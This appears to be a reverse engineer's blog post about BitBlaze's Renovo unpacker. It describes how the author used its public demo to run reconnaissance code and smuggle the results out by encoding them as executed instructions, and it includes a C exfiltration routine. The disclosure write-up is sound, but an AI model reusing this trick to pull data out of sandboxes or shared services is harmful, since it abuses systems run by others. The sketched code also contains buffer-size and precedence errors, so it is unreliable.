Renovo is an automated "unpacking" tool developed by BitBlaze at UC Berkeley. The notion behind Renovo is that packers frequently encrypt and/or compress regions of code at the time of protection, and decrypt/decompress these regions while the packer executes. The Renovo paper terms these regions "hidden code", and the goal of Renovo as a system is to retrieve the hidden code regions generated throughout packer execution.
(Note that Renovo is not what we might consider a truly automated unpacker, as it does not attempt to reconstruct working executables. I.e., protections regarding imported symbols are not resolved, and other forms of protection such as virtualization obfuscation are ignored.)
Renovo is built atop QEMU, and performs a watered-down form of dynamic taint analysis. Namely, every time the packer code writes to memory, the written addresses are considered "dirty", with such information being recorded in a table. Then, for every instruction executed throughout the course of packer execution, Renovo queries the dirty-address table to determine whether the instruction's address has previously been overwritten. If this is the case, Renovo considers this moment in time as beginning the execution of "hidden code". It makes a note of the event, and dumps the surrounding dirty regions. This simple technique is very effective in tracking execution within memory regions that have previously been written.
For a brief period of time, the folks at BitBlaze put Renovo online for public evaluation. It had a web interface allowing the user to upload malicious binaries. The system then ran the binaries through Renovo, collected all of the hidden code regions gathered on a particular run, and emailed the results to the user.
Since I am a reverse engineer, I could not resist the temptation to screw around with this system. In particular, I wanted to know whether there was any secret sauce running inside of the emulated environment (beyond the modifications to QEMU). The nature of the public demonstration allowed me to run code of my choosing within the Renovo environment. I.e., I could enumerate the file system, the drivers, registry keys of my choosing, and so on. But how was I going to exfiltrate the results?
After some thought, I realized that if I could turn the data into code and execute it, Renovo would happily email it back to me, because that is exactly what it was designed to do.
In particular, suppose I wish to exfiltrate the contents of some buffer filled with reconnaissance data. First, allocate RWX memory of an appropriate size. Now, let's consider our data buffer as a collection of 32-bit integers. Take the first integer, dw0, and use it to create the instruction "add eax, dw0", i.e., "05 XX YY ZZ WW", where dw0 is 0xWWZZYYXX. Repeat this process for all integers within the buffer. At the end, write a "retn" instruction, i.e., 0xC3. Now execute this piece of freshly-generated code.
Renovo will detect this as "hidden code" executed by the process, and send the entire piece of allocated memory back to me. From there, it is a simple matter to strip out the "05" bytes (corresponding to "add eax, dword") and the trailing "C3" byte ("retn"), and reconstruct the original data buffer. The code looked roughly as follows:
#define DWORD_AS_CODE(ptr,value) {\
*ptr++ = 0x05;\ // ADD EAX, DWORD
*(long *)ptr = value;\
ptr += 4;}
typedef void (*fptr)(void);
void exfiltrate(unsigned int len, const char *buf)
{
char *exfil = VirtualAlloc(0, (len+4)*(5/4), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
fptr fp = (fptr)exfil;
DWORD_AS_CODE(exfil,len);
for(int i = 0; i < (len+3)&~3 >> 2; ++i)
DWORD_AS_CODE(exfil,((long *)buf)[i]);
*exfil = 0xC3; // RETN
fp();
}
It worked like a charm. I played around dumping various things out of the virtual environment until I got bored and emailed the project maintainers with my findings, who promptly took the service offline and never brought it back.